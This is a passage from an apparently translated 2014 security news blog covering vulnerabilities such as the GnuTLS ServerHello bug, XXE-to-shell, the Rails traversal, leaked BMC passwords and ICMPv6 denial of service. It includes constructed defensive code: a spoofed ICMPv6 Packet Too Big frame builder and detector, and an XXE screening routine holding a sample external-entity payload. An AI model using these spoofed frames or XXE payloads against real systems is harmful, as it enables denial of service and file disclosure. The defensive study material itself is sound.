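# --- constructed toy key material ---
P, Q = 999983, 1000003             # toy RSA primes
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent: held by KeyServer only
DH_P = 2 ** 127 - 1                # toy DH modulus (Mersenne prime M127)
DH_G = 5


def to_bytes(x: int) -> bytes:
    return x.to_bytes((x.bit_length() + 7) // 8 or 1, "big")


def h(data: bytes) -> int:
    """Hash to an integer below N (stand-in for the signed handshake digest)."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % N


def derive(premaster: int) -> bytes:
    """Session key derivation; both ends must compute the same value."""
    return hashlib.sha256(b"keyless-demo" + to_bytes(premaster)).digest()


class KeyServer:
    """Runs in the customer's own infrastructure; the only holder of D."""

    def __init__(self):
        self.seen = []  # every value the key server got to see

    def rsa_decrypt(self, ciphertext: int) -> int:
        premaster = pow(ciphertext, D, N)
        self.seen.append(premaster)  # RSA mode: key server learns the premaster
        return premaster

    def sign(self, digest: int) -> int:
        self.seen.append(digest)     # DHE mode: only a hash of public values
        return pow(digest, D, N)


class Client:
    """Browser side; knows only the public key (N, E)."""

    def __init__(self):
        self.premaster = None

    def send_rsa_premaster(self) -> int:
        self.premaster = secrets.randbelow(N - 2) + 2
        return pow(self.premaster, E, N)            # ClientKeyExchange

    def receive_server_kex(self, g_x: int, sig: int) -> int:
        if pow(sig, E, N) != h(to_bytes(g_x)):      # verify ServerKeyExchange
            raise ValueError("bad signature on ephemeral DH value")
        y = secrets.randbelow(DH_P - 2) + 1
        self.premaster = pow(g_x, y, DH_P)
        return pow(DH_G, y, DH_P)                   # ClientKeyExchange


class Edge:
    """CDN edge: terminates TLS, never holds D, asks KeyServer per handshake."""

    def __init__(self, key_server: KeyServer):
        self.ks = key_server

    def handshake_rsa(self, client: Client) -> bytes:
        ciphertext = client.send_rsa_premaster()
        premaster = self.ks.rsa_decrypt(ciphertext)  # one key-server round trip
        return derive(premaster)

    def handshake_dhe(self, client: Client) -> bytes:
        x = secrets.randbelow(DH_P - 2) + 1
        g_x = pow(DH_G, x, DH_P)
        sig = self.ks.sign(h(to_bytes(g_x)))          # one key-server round trip
        g_y = client.receive_server_kex(g_x, sig)
        return derive(pow(g_y, x, DH_P))


def run(mode: str) -> dict:
    """Run one handshake and report who ended up knowing what."""
    ks, client = KeyServer(), Client()
    edge = Edge(ks)
    edge_key = edge.handshake_rsa(client) if mode == "rsa" else edge.handshake_dhe(client)
    return {
        "keys_match": edge_key == derive(client.premaster),  # edge reads the traffic
        "keyserver_saw_premaster": client.premaster in ks.seen,
        "keyserver_calls": len(ks.seen),                      # cost per connection
    }


if __name__ == "__main__":
    for mode in ("rsa", "dhe"):
        print(mode, run(mode))
```

In both modes the edge can read the traffic and each new connection costs one key-server round trip (the HN post's points 1 and the latency remark); only with DHE does the key server never see the premaster secret.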

References




OpenSSL Development Team releases first public security policy

2014.09.08

The OpenSSL team has published a security policy in which the developers describe how security vulnerabilities or other problems with OpenSSL tools and libraries are to be reported to the team and then handled by it.

"We have an email address which can be used to notify us of possible security vulnerabilities. A subset of OpenSSL team members receive this mail, and messages can be sent using PGP encryption. Full details are at https://www.openssl.org/news/vulnerabilities.html

When we are notified about an issue we engage resources within the OpenSSL team to investigate and prioritise it. We may also utilise resources from the employers of our team members, as well as others we have worked with before."

References




Popping a shell on the Oculus developer portal

2014.09.01

From the blog

"It's not every day you find a CSRF-RCE, where sending an admin to a malicious webpage gives you a shell on their server, but that's what I discovered while exploring the security of the Oculus developer portal." (Jon of Bitquark)

read more


Reference




DoS attacks (ICMPv6-based) resulting from IPv6 EH drops

2014.08.22

Fernando Gont shows in a mail to Full Disclosure a very simple way to force a DoS between servers (or BGP routers) by means of an ICMPv6 packet, forced fragmentation and a spoofed sender address.

1) It is known that filtering of packets containing IPv6 Extension
    Headers (including the Fragment Header) is widespread (see our I-D above)

2) Let us assume that Host A is communicating with Server B, and that
    some node filters fragments between Host A and Server B.

3) An attacker sends a spoofed ICMPv6 PTB to server B, with a "Next Hop
    MTU<1280), in the hopes of eliciting "atomic fragments" (see
   <http://tools.ietf.org/rfc/rfc6946.txt>) from now on.

4) Now server B starts sending IPv6 atomic fragments... And since they
   include a frag header (and in '2)' above we noted that frags are dropped
   on that path), these packets get dropped (i.e., DoS).
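A defender-side check for step 3 of the mail, as an added example that is not Fernando Gont's code: parse an ICMPv6 Packet Too Big message and flag one whose advertised MTU is below the IPv6 minimum link MTU of 1280, since such a message cannot describe a real link and only serves to elicit atomic fragments. The frames are constructed inside the block and the ICMPv6 checksum is neither computed nor verified.

```python
"""Inspect ICMPv6 Packet Too Big (PTB) messages for the atomic-fragment trick.

Added example; sample frames are constructed below, checksums are left zero.
"""
import ipaddress
import struct

IPV6_MIN_MTU = 1280        # RFC 2460: minimum IPv6 link MTU
NEXT_HEADER_ICMPV6 = 58
ICMPV6_PACKET_TOO_BIG = 2


def parse_ipv6_header(buf: bytes) -> dict:
    if len(buf) < 40:
        raise ValueError("truncated IPv6 header")
    first, payload_len, next_header, _hop_limit = struct.unpack("!IHBB", buf[:8])
    if first >> 28 != 6:
        raise ValueError("not an IPv6 packet")
    return {
        "payload_len": payload_len,
        "next_header": next_header,
        "src": ipaddress.IPv6Address(buf[8:24]),
        "dst": ipaddress.IPv6Address(buf[24:40]),
    }


def inspect_ptb(frame: bytes) -> dict:
    """Classify one IPv6 frame; only PTB messages get a verdict."""
    outer = parse_ipv6_header(frame)
    if outer["next_header"] != NEXT_HEADER_ICMPV6:
        return {"verdict": "ignore", "reason": "not ICMPv6"}
    icmp = frame[40:]
    if len(icmp) < 8:
        raise ValueError("truncated ICMPv6 header")
    msg_type, _code, _checksum, mtu = struct.unpack("!BBHI", icmp[:8])
    if msg_type != ICMPV6_PACKET_TOO_BIG:
        return {"verdict": "ignore", "reason": "not Packet Too Big"}
    findings = []
    # Step 3 of the post: an MTU below 1280 cannot describe a real link; the
    # only effect of honouring it is to start emitting atomic fragments.
    if mtu < IPV6_MIN_MTU:
        findings.append("mtu_below_ipv6_minimum")
    # The invoking packet is supposed to be one we sent: its source must be us.
    try:
        inner = parse_ipv6_header(icmp[8:])
    except ValueError:
        findings.append("unparseable_invoking_packet")
    else:
        if inner["src"] != outer["dst"]:
            findings.append("invoking_packet_not_ours")
    return {
        "verdict": "suspicious" if findings else "ok",
        "mtu": mtu,
        "claimed_sender": str(outer["src"]),
        "findings": findings,
    }


def build_ptb(sender: str, target: str, mtu: int,
              invoking_src: str, invoking_dst: str) -> bytes:
    """Construct a PTB frame for testing (ICMPv6 checksum left as zero)."""
    inner_payload = b"\x00" * 8  # stub of the packet that was "too big"
    inner = struct.pack("!IHBB", 6 << 28, len(inner_payload), 6, 64)
    inner += ipaddress.IPv6Address(invoking_src).packed
    inner += ipaddress.IPv6Address(invoking_dst).packed + inner_payload
    icmp = struct.pack("!BBHI", ICMPV6_PACKET_TOO_BIG, 0, 0, mtu) + inner
    outer = struct.pack("!IHBB", 6 << 28, len(icmp), NEXT_HEADER_ICMPV6, 64)
    outer += ipaddress.IPv6Address(sender).packed
    outer += ipaddress.IPv6Address(target).packed
    return outer + icmp


# Constructed samples: Server B is 2001:db8::b, Host A is 2001:db8::a.
SPOOFED_PTB = build_ptb("2001:db8:ffff::1", "2001:db8::b", 1000,
                        "2001:db8::b", "2001:db8::a")
GENUINE_PTB = build_ptb("2001:db8:1::1", "2001:db8::b", 1400,
                        "2001:db8::b", "2001:db8::a")

if __name__ == "__main__":
    print(inspect_ptb(SPOOFED_PTB))
    print(inspect_ptb(GENUINE_PTB))
```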

References




Google ranking improved for HTTPS sites

2014.08.20

Since August 2014 Google has been taking HTTPS encryption of websites into account in its search engine ranking.

"For these reasons, over the past few months we’ve been running tests taking into account whether sites use secure, encrypted connections as a signal in our search ranking algorithms. We’ve seen positive results, so we’re starting to use HTTPS as a ranking signal. For now it's only a very lightweight signal—affecting fewer than 1% of global queries, and carrying less weight than other signals such as high-quality content—while we give webmasters time to switch to HTTPS. But over time, we may decide to strengthen it, because we’d like to encourage all website owners to switch from HTTP to HTTPS to keep everyone safe on the web." Google Online Security Blog

References




Book: Bulletproof SSL and TLS available

2014.08.19

The book "Bulletproof SSL and TLS" by Ivan Ristic, available in excerpts since February of this year, is now available in print.

The book provides an overview of the current SSL/TLS landscape, gives insights into setting up and operating a PKI, and covers (Open)SSL deployments in detail with regard to performance, security and use with popular web server/application server technologies.

"It gives me great pleasure to announce that my book, Bulletproof SSL and TLS, has now been officially released. The end result is about 528 pages of text (in print; 513 in the version optimised for screen reading) spread across 16 chapters. The book is a complete package with an introduction to cryptography, SSL, TLS, and PKI, followed by a complete coverage of the current problems with the protocols as well as the entire ecosystem, and a ton of practical advice for configuration and performance tuning." Ivan Ristic


Table of Contents

Part I: SSL/TLS and PKI

  1. SSL, TLS, and Cryptography
  2. Protocol
  3. Public Key Infrastructure
  4. Attacks against PKI
  5. HTTP and Browser Issues
  6. Implementation Issues
  7. Protocol Attacks

Part II: Deployment and Development

  8. Deployment
  9. Performance Optimization
  10. HSTS, CSP and Pinning

Part III: Practical Configuration

  11. OpenSSL Cookbook
  12. Testing with OpenSSL
  13. Configuring Apache
  14. Configuring Java and Tomcat
  15. Configuring Microsoft Windows and IIS
  16. Configuring Nginx

References




Spamhaus blacklists GMX and 1&1 (Update)

2014.08.15


Spamhaus has put outgoing mail servers of GMX and 1&1 (mout.gmx.de / 212.227.15.18 ff., mout.kundenserver.de / 212.227.17.24) on its blacklist; apparently the cause is an original listing via abuseat.org (CBL), which is taken over by the Spamhaus XBL.

The Spamhaus listing took place in the night of 14 to 15 August.

One of the mail providers currently affected is Domainfactory, as it uses the Spamhaus XBL for spam filtering; as a temporary workaround Domainfactory recommends disabling spam filtering for the mailboxes.


IP Address 212.227.15.19 is listed in the CBL. It appears to be infected with a spam sending trojan, proxy or some other form of botnet.

It was last detected at 2014-08-14 15:00 GMT (+/- 30 minutes), approximately 15 hours, 30 minutes ago.

GMX customers who try to send mail via SMTP to a mail system protected by Spamhaus receive the following error message:

A message that you sent could not be delivered to one or more of
its recipients. This is a permanent error. The following address
failed:

"nospam@mare-system.de":
SMTP error from remote server in greeting:
host: mxlb.ispgateway.de:
IP 212.227.15.19 is blacklisted (xbl.spamhaus.org). Help at/Hilfe unter
www.mfaq.info



LibreSSL Portable released (Update)

2014.07.12

  • 2014-07-15 - first analyses available
  • 2014-07-13 - the 2nd release is available

In a mail to the OpenBSD mailing list, Bob Beck announced the first release of LibreSSL Portable; LibreSSL is thus available from now on for OpenBSD, Linux, OSX, Solaris and FreeBSD:

Notice First Release

The first release of LibreSSL portable has been released. LibreSSL
can be found in the LibreSSL directory of your favorite OpenBSD mirror.

http://ftp.openbsd.org/pub/OpenBSD/LibreSSL has it, and other mirrors
will soon.

libressl-2.0.0.tar.gz has been tested to build on various versions of
Linux, Solaris, Mac OSX, and FreeBSD.

This is intended as an initial release to allow the community to start
using and providing feedback. We will be adding support for
other platforms as time and resources permit.

As always, donations (http://www.openbsdfoundation.org/donations.html)
are appreciated to assist in our efforts.

Enjoy,

-Bob

Notice 2nd Release

We have released an update, LibreSSL 2.0.1

This release includes a number of portability fixes based on the
initial feedback we have received from the community.  This includes
among other things two new configure options to set OPENSSLDIR and
ENGINESDIR. We have removed a few hardcoded compiler options that
were problematic on some systems as well as -Werror. We have also
re-synced with the latest OpenBSD sources as a number of issues
were fixed upstream. This release also includes pkg-config support.

As noted before, we welcome feedback from the broader community.

Also starting with this release the directory includes SHA256
signatures which are signed using signify.

The signify public key for libressl is:

untrusted comment: LibreSSL Portable public key
RWQg/nutTVqCUVUw8OhyHt9n51IC8mdQRd1b93dOyVrwtIXmMI+dtGFe   

Enjoy,
-Bob

First analyses

Andrew Ayer has carried out the first crypto analysis and comes to the following conclusion:

"After testing and examining the codebase, my feedback is that the LibreSSL PRNG is not robust on Linux and is less safe than the OpenSSL PRNG that it replaced."

For further details and discussion see the links in the references (reddit, hackernews).

References




AES timing attacks on OpenSSL

2014.07.03

TL;DR:

  • You did not answer my original question, is AES in OpenSSL affected?
  • In short, no.

(further information will follow after a detailed analysis of the article and of further sources that are currently being evaluated)

References




Enterprise, my ass: backdoor in Cisco's Unified Communications Domain Manager

2014.07.03

Cisco has warned in an advisory that Unified Communications installations can be taken over by third parties via a pre-installed SSH key, with which they can then obtain root privileges.

In addition to faux pas no. 1, Cisco has managed a second one: not only the public key is stored on the systems but also the private key; in plain terms this means that every owner of a Cisco Unified Communications system is in possession of the private key and can use it to gain unauthorized access to other installations m(

lolwut

References




Virus Bulletin celebrates 25th birthday by making all content free

2014.07.01

On the occasion of VirusBulletin's 25th birthday, the makers have decided to make future content freely available:

As of today, all content published in Virus Bulletin will become freely available - not only do you no longer need a subscription, you don't even need to be a registered user on our website to access the content.

happy birthday, virusbulletin

References




No more Microsoft advisory email notifications (Update)

2014.06.30

Update 1 / 2014-07-01:

As Larry Seltzer of ZDNet reports, Microsoft has reconsidered its strategy:

On June 27, 2014, Microsoft notified customers that we were suspending Microsoft Security Notifications due to changing governmental policies concerning the issuance of automated electronic messaging. We have reviewed our processes and will resume these security notifications with our monthly Advanced Notification Service (ANS) on July 3, 2014

via SANS ISC:

********************************************************************
 Title: Microsoft Security Notifications
 Issued: June 27, 2014
********************************************************************

Notice to IT professionals:

As of July 1, 2014, due to changing governmental policies concerning the issuance of automated electronic messaging, Microsoft is suspending the use of email notifications that announce the following:

 * Security bulletin advance notifications
 * Security bulletin summaries
 * New security advisories and bulletins
 * Major and minor revisions to security advisories and bulletins

In lieu of email notifications, you can subscribe to one or more of the RSS feeds described on the Security TechCenter website. 

For more information, or to sign up for an RSS feed, visit the Microsoft Technical Security Notifications webpage at http://technet.microsoft.com/security/dd252948

References




Chrome: world domination in 5 years

2014.06.28

Russell Beattie has published via Twitter a short video assembled from StatCounter data, in which he shows how the worldwide browser distribution has shifted over the last 5 years from IE to Firefox and on to the dominance of Google's Chrome.



Related:


References




Identifying (and Exploiting) Xml eXternal Entity vulnerability (XXE)

2014.06.27

Philippe Arteau demonstrates in a video how, via an XML import and XXE, one can obtain a shell on a vulnerable system (RunKeeper.com) and execute arbitrary commands.

In the accompanying article he explains in detail the individual steps that ultimately lead to remote code execution. [1] XXE flaws can generally lead to serious security problems; Reginaldo Silva, for example, managed to gain remote access to Facebook servers through a similar flaw. [2]

WAF rules for detecting XXE attacks have been available for Naxsi for some time [3]
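What a WAF rule of the kind referenced under [3] amounts to, as an added example that is not Naxsi's or Philippe Arteau's code: reject XML imports that carry DOCTYPE or entity declarations before the parser ever sees them, with the stdlib parser as a second line of defence. The activity-import document format, both sample uploads and the entity's placeholder path are constructed.

```python
"""Screen an XML import for XXE before parsing it (added example).

The document layout and both samples are constructed; the entity's SYSTEM
target is a placeholder path, not a real file.
"""
import re
import xml.etree.ElementTree as ET

# Mirrors the idea behind a WAF rule for XXE: an import endpoint has no
# legitimate reason to carry a DOCTYPE or entity declarations at all.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\b", re.IGNORECASE)


def screen_xml_upload(data: bytes) -> list:
    """Return the reasons (if any) to reject the upload without parsing it."""
    findings = []
    if DOCTYPE_RE.search(data):
        findings.append("doctype_declaration")
    if ENTITY_RE.search(data):
        findings.append("entity_declaration")
    return findings


def parse_activities(data: bytes) -> list:
    """Parse the constructed activity format with the stdlib parser.

    xml.etree never resolves external entities; a reference to one raises
    ParseError instead of reading a file.
    """
    root = ET.fromstring(data)
    return [(a.get("type"), a.findtext("distance")) for a in root.iter("activity")]


def import_activities(data: bytes, screen: bool = True) -> tuple:
    """Return ('ok', activities) or ('rejected', reason)."""
    if screen:
        findings = screen_xml_upload(data)
        if findings:
            return ("rejected", "waf: " + ",".join(findings))
    try:
        return ("ok", parse_activities(data))
    except ET.ParseError as exc:
        return ("rejected", "parser: %s" % exc)


# Constructed uploads: a benign one and one declaring an external entity.
SAFE_UPLOAD = (
    b'<?xml version="1.0"?>'
    b'<activities><activity type="run"><distance>5.2</distance></activity></activities>'
)
XXE_UPLOAD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE activities [<!ENTITY xxe SYSTEM "file:///placeholder/path">]>'
    b'<activities><activity type="run"><distance>&xxe;</distance></activity></activities>'
)

if __name__ == "__main__":
    print(import_activities(SAFE_UPLOAD))
    print(import_activities(XXE_UPLOAD))                # rejected by screening
    print(import_activities(XXE_UPLOAD, screen=False))  # rejected by the parser
```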


Demonstration of the attacks described previously. (Fullscreen recommended)


References

  1. Identifying Xml eXternal Entity vulnerability (XXE)
  2. XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers
  3. WAF: Naxsi rule against XXE exploits



SSL/TLS capabilities of 30+ widely used browsers and devices

2014.06.27

Qualys' SSL Labs has published a list of the SSL capabilities of 30 current, widely used browsers and clients:


References




Wanna know the PWD for the Brasil world cup security center WiFi Network?

2014.06.25

It's on the whiteboard!


via: @apbarros




Realtime Attack-Map (Norse)

2014.06.25

After Arborsert last autumn, Norse now also provides graphically animated live data that gives an insight into current attack activity. Besides DDoS attacks, the map also shows brute-force attempts (SSH, RDP and others) and attacks on web applications.


References




History theft with CSS Boolean algebra

2014.06.24

Michal Zalewski, aka lcamtuf:

"OK, this is more fun than any immediate risk...

Those of you who follow web security topics probably remember that
until mid-2010, you could extract very substantial chunks of one's
browsing history by applying distinctive styling to thousands of
off-screen :visited links and then reading that information back
through the getComputedStyle API or in a couple of related ways.

This loophole has been closed by making it practically impossible to
programmatically measure any side effects of the styling applied to
:visited links (spare for some relatively wonky redraw timing
attacks). The information could be read back only with user's
assistance, which seemed much less interesting for two reasons:

1) It is relatively difficult to come up with really compelling,
casual interactions where the user would unwittingly divulge styling
information on specially prepared links to a rogue website,

2) Even if you could come up with such an attack, you would be limited
to probing roughly one visited link per click, so the throughput would
be very low.

Few months ago, I published a whimsical PoC showing that the first
assumption may be somewhat short-sighted. True to my lifelong dream of
becoming a fabulously wealthy game developer, I created this
low-grade, knock-off version of Asteroids:

http://lcamtuf.coredump.cx/yahh/

Today, I wanted to show an equally silly but less entertaining
proof-of-concept that touches on the latter topic. The PoC shows how
to measure the state of multiple links - possibly a dozen or so - with
a single casual click:

http://lcamtuf.coredump.cx/css_calc/

The PoC is based on carefully constructing Boolean operators with the
extremely rudimentary subset of CSS permitted for :visited links. I
don't want to spoil it all, but you can pull it off in a somewhat
funny way. There is no game included; I was going to have a logo for
this vulnerability instead, but my publicist didn't deliver (again).

Cheers,
/mz

References




MOD_SPDY is an official Apache project

2014.06.20

The Apache module mod_spdy, previously developed by Google, has been handed over to the Apache Foundation, thereby becoming an integral part of the Apache web server 2.4, and is to become one of the core features from version 2.6 on.

From the announcement on the Google Developers blog:

We’re pleased to announce that Google has formally donated mod_spdy’s code to the Apache Software Foundation, and it is now a part of the Apache httpd codebase.

"The intent is to work on making it fully part of [Apache] 2.4 and, of course, a core part of 2.6/3.0" - Jim Jagielski, co-founder of the ASF.

The SPDY protocol developed by Google is considered a hot candidate for version 2 of the HTTP protocol and is, besides Apache, also available for Nginx.

References




GET /passwords.txt - 200 OK: 32,000 servers at risk from BMC flaw

2014.06.20

Zachary Wikholm has found another vulnerability in the BMC implementation of Supermicro servers: according to him, it is possible to obtain the access passwords in plaintext via a simple GET request to port 49152; according to a Shodan scan, more than 9 million servers respond to this request, and in 32,000 cases the password file could be downloaded.

This means at the point of this writing, there are 31,964 systems that have their passwords available on the open market. It gets a bit scarier when you review some of the password statistics. Out of those passwords, 3296 are the default combination. Since I’m not comfortable providing too much password information, I will just say that there exists a subset of this data that either contains or just was "password".

References




Storage fallout: behaviour of distributed databases under network/node failures (Elasticsearch, etcd, Consul, RabbitMQ, Redis, Cassandra, NuoDB, Kafka, MongoDB, Postgres)

2014.06.20

Kyle Kingsbury describes in a series of articles the behaviour of various distributed databases under load or partial network/node failure. In particular, replication, fault tolerance, data consistency and potential data loss are examined.






PoC for Docker VMM-container breakout

2014.06.18

A statement from the maintainer:

Hi all, I'm a maintainer of Docker. As others already indicated this doesn't work on 1.0. But it could have. Please remember that at this time, we don't claim Docker out-of-the-box is suitable for containing untrusted programs with root privileges. So if you're thinking "pfew, good thing we upgraded to 1.0 or we were toast", you need to change your underlying configuration now. Add apparmor or selinux containment, map trust groups to separate machines, or ideally don't grant root access to the application. Docker will soon support user namespaces, which is a great additional security layer but also not a silver bullet! When we feel comfortable saying that Docker out-of-the-box can safely contain untrusted uid0 programs, we will say so clearly.

References




Online tests for the latest and greatest OpenSSL vulns (en)

2014.06.15

There are various online services available that check web servers for the latest and greatest OpenSSL vulnerabilities such as the Early ChangeCipherSpec attack (CVE-2014-0224):

  • SSLLabs has already implemented the CCS test in their development version
  • ccsbug.exposed is a test created by NCC Group
  • 8ack.de SSLScan is a service testing for Heartbleed (CVE-2014-0160) and the CCS vuln

Remarks: all tests should be considered experimental; we had cases where we couldn't get reliable scan results for one definitely fixed server with the tools linked above; rule of thumb: if you use only distro packages and are sure your systems are updated and services restarted, the server should be safe. YMMV






Online tests for OpenSSL vulnerabilities

2014.06.11

For the new OpenSSL vulnerabilities published last week, online services and a test script are now available with which publicly reachable servers can be tested:

  • SSLLabs has already implemented the check for the CCS flaw in its development version at dev.ssllabs.com
  • ccsbug.exposed, NCC Group's test for the CCS flaw
  • 8ack.de - SSLScan from 8ack.de, tests for Heartbleed (CVE-2014-0160) and the CCS flaw (CVE-2014-0224)

Note: at the moment all test methods are experimental, only work against web servers and can produce both false positives and false negatives; one case is known in which both positive and negative results were produced for the same server with the same or different tools; as a rule of thumb: if the distribution packages are used, updates have been installed and the relevant services restarted, the server should be safe. YMMV






One Token to Rule Them All - The Tale of the Leaked Gmail Addresses

2014.06.10

Oren Hafif of SpiderLabs has found a way to extract all Gmail addresses, including business accounts, by token fuzzing.

From the blog:

Short Version
I really think that you'll enjoy this blog, however, for those of you who can't take 5 minutes to read it, here is a one-liner:
I bruteforced a token in a Gmail URL to extract all of email addresses hosted on Google.


In a further article (From a Username to Full Account Takeover) he explains how email addresses and phone numbers are nowadays linked to online identities and what information and attack opportunities are available to hackers who get hold of this data: spear phishing, attacks on applications and account takeover, damage to reputation.

Summary
Usernames, email addresses and phone numbers are invaluable pieces of information for attackers. They can be used in a large variety of attacks which in some cases result in full account takeover.

When it comes to username leakage – size matters. The bigger the list of exposed username the more damage can be done by a malicious entity.

Mat Honan, editor at Wired magazine, has spoken openly about the effects of a hostile account takeover: how a digital existence can be wiped out in 30 minutes

References




Technical Analysis Of The GnuTLS Hello Vulnerability (CVE-2014-3466)

2014.06.05

The developers of the GnuTLS library have published an advisory warning of a flaw that mainly affects clients and can lead to remote code execution on the client side; updates are available: [1]

This vulnerability affects the client side of the gnutls library. A server that sends a specially crafted ServerHello could corrupt the memory of a requesting client. Recommendation: Upgrade to the latest gnutls version (3.1.25, 3.2.15 or 3.3.4)

In an extensive article, whose title we have shamelessly cloned, pancake of radare.info explains the technical background of the flaw: Technical Analysis Of The GnuTLS Hello Vulnerability / by radare.today; a PoC is available [3].

Impact

GnuTLS is used by a large number of clients (see the list further below); the flaw leads to memory corruption and possibly to remote code execution on the client side. We could only test the PoC offered under [3] successfully with the gnutls-cli tool; wget appears to be vulnerable and crashes with a segfault, curl does not appear to be vulnerable, at least an error is detected and the program terminates with an error message.

[ sunny@sunday247 :~] > wget https://localhost:12345/
--2014-06-05 10:07:04--  https://127.0.0.1:12345/
Connecting to 127.0.0.1:12345... connected.
GnuTLS: No supported cipher suites have been found.
Segmentation fault

[ sunny@sunday247  :~] > curl -k https://localhost:12345/
curl: (35) error:1409212C:SSL routines:SSL3_GET_SERVER_HELLO:ssl3 session id too long

Mitigations & Workarounds

No workarounds are known; updates are available for RedHat, for Debian updates are expected today or tomorrow at the latest, for SLES no information is available [4,5]

List of programs that use GnuTLS (Debian):

# apt-cache rdepends libgnutls26 | grep -v lib
Reverse Depends:
  telepathy-gabble
  qemu-kvm
  guile-gnutls
  gnutls-bin
  xxxterm
  xpp
  xfprint4
  xfce4-mailwatch-plugin
  xen-utils-4.1
  x11vnc
  wzdftpd-mod-tcl
  wzdftpd-mod-perl
  wzdftpd-back-pgsql
  wzdftpd-back-mysql
  wzdftpd
  wmbiff
  wget
  weechat-curses
  weechat-core
  webfs
  vpnc
  vlc-nox
  vino
  ucommon-utils
  totem-plugins
  telepathy-salut
  telepathy-gabble
  tdsodbc
  suricata
  sogo
  snort-pgsql
  snort-mysql
  snort
  slapd
  sipwitch-cgi
  sipwitch
  sipsak
  shishi-kdc
  shishi
  shisa
  scrollz
  samhain
  rtmpdump
  rsyslog-gnutls
  qpdfview
  qemu-system-x86
  qemu-system-sparc
  qemu-system-ppc
  qemu-system-misc
  qemu-system-mips
  qemu-system-arm
  python-pycurl-dbg
  python-pycurl
  python-preludedb
  python-prelude
  python-mailutils
  python-gtk-vnc
  python-gnutls
  proxytunnel
  printer-driver-gutenprint
  prelude-manager
  prelude-lml
  postal
  pianobar
  passing-the-hash
  pacemaker
  openvas-scanner
  openvas-manager
  openvas-cli
  openvas-administrator
  nzbget
  nullmailer
  ntfs-3g
  ngircd
  newsbeuter
  network-manager
  netatalk
  nautilus-sendto-empathy
  mutt-patched
  mutt
  msmtp-gnome
  msmtp
  mpop-gnome
  mpop
  mozilla-gtk-vnc
  minbif
  mandos-client
  mailutils-pop3d
  mailutils-mh
  mailutils-imap4d
  mailutils-comsatd
  mailutils
  macopix-gtk2
  lynx-cur
  linuxvnc
  lftp
  ldap-utils
  kildclient
  jd
  ircd-ratbox
  inspircd
  infinoted
  heartbeat
  gvncviewer
  gurlchecker
  guile-gnutls
  gtklp
  gtk-gnutella
  gsd
  gsasl
  greenbone-security-assistant
  gobby-0.5
  gnutls-bin
  gnu-smalltalk
  gnomint
  gnome-settings-daemon
  gnome-control-center
  gkrellm
  ghostscript-cups
  freetds-bin
  filezilla
  exim4-daemon-light
  exim4-daemon-heavy
  empathy
  elinks-lite
  elinks
  ekg2-remote
  ekg2-jabber
  echoping
  dsyslog
  cups
  csync2
  connman
  claws-mail-trayicon
  claws-mail-spamassassin
  claws-mail-smime-plugin
  claws-mail-pgpmime
  claws-mail-pgpinline
  claws-mail-bogofilter
  claws-mail
  charybdis
  centerim-utf8
  centerim-fribidi
  centerim
  cairo-dock-mail-plug-in
  bitlbee
  ario
  aria2
  anubis
  aiccu
  abiword

References




Tomcat patches close several DoS flaws (CVE-2014-0075, CVE-2014-0095)

2014.06.03

The Tomcat development team has released patches for versions 6/7/8 that close several flaws which, among other things, enable DoS attacks (CVE-2014-0075, CVE-2014-0095).

Happy Patching!

References




A journey to abused FTP sites (story of Shells, Malware, Bots, DDoS, Spam, Cloudflare evasion)

2014.06.03

Hendrik Adrian (@unixfreaxjp) of MalwareMustDie has looked at the current PHP/server bot scene using 7 examples and found a few old acquaintances that have adapted to technical developments over time; whereas the still-in-use pBot had just 3 attack modes 5 years ago (udpflood, tcpflood, synflood), 7 different attack modes are now known, and apparently also a way to bypass Cloudflare's DDoS protection by reading and storing cookies.

pBot attack modes 2014:

  • udpflood
  • httpflood (NEW!)
  • synflood (IMPROVED!)
  • slowlorrisflood (NEW!)
  • rudyflood (NEW!)
  • armeflood (NEW!)
  • cloudflareflood (NEW!)
  • tcpflood (IMPROVED!)

Screenshot of the Cloudflare mitigation:

pbot

References




The Anatomy of a Rails Vulnerability-CVE-2014-0130: From Directory Traversal to Shell

2014.05.29

Interesting paper by Jeff Jarmoc in which he describes the path from exploiting a directory traversal vulnerability (see SB 14.11) to ultimately executing arbitrary commands on the server (remote code execution).

"In this paper, we explore the attack vectors of this vulnerability, as well as additional impacts beyond simple file retrieval. These include remote code execution across a variety of Ruby on Rails deployment environments. If you take away one thing, it should be this: vulnerability impact is not always clear without close review. In this case, the advisories say arbitrary file read, with a highly unusual configuration. We'll see how to achieve remote code execution with a more common setup."

rails-exploit

Affected server configurations:

rails-cve-2014-0130

References




TrueCrypt: hacked or gagged?

2014.05.29

truecrypt is not secure

In a statement on their Sourceforge page, the TrueCrypt developers announce that development of TrueCrypt was ended in May 2014 and that the software is no longer to be considered secure:

WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues. This page exists only to help migrate existing data encrypted by TrueCrypt.

The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP

This announcement is causing confusion (see also the corresponding reddit discussion) and feeds several conspiracy theories as to whether the site was hacked, or whether the TrueCrypt developers, like the Lavabit founder, are using this move to hint (without being officially allowed to say so) that they have received a National Security Letter including a gag order, which would force them to take certain measures / build in backdoors and, above all, to keep quiet about it.

Other theories assume that the official site / DNS was hijacked and the Sourceforge account cracked; after all, Sourceforge recently had an incident with a notice asking everyone to please change all passwords.

References




Project Un1c0rn: a list of exploitable servers

2014.05.22

All your exploitable Services are belong to Un1c0rn: at un1c0rn.net the Un1c0rn project analyses and indexes openly attackable services that offer external access to MongoDB or poorly protected MySQL/Postgres databases. The Un1c0rn database can be searched by tags or keywords; currently ~40,000 servers are indexed, and the number is rising sharply; half of them, i.e. 20,000 servers, grant the world and his dog read/write access to a MongoDB; those who prefer MySQL will find about 2,000 MySQL servers with poorly or not at all secured access (empty password or weak passwords such as "toor, 1234, test").

On the author's motivation:

It's actually to expose what's publicly available to everyone without a lot of effort. This project was deployed in 1 week and already has indexed thousands of access leaked through heart-bleed but also access to users databases in open mongo database and mysql server. I believe it might open some eyes seeing what some people can see since 2 years (or more).

A quick test showed that the results of the Un1c0rn search engine are accurate (see screenshot); what is very surprising is that in 2014 there are still servers online with completely unprotected services.

unicorn

Links:




IETF: Pervasive monitoring is an attack / RFC 7258 / BCP 188

2014.05.21

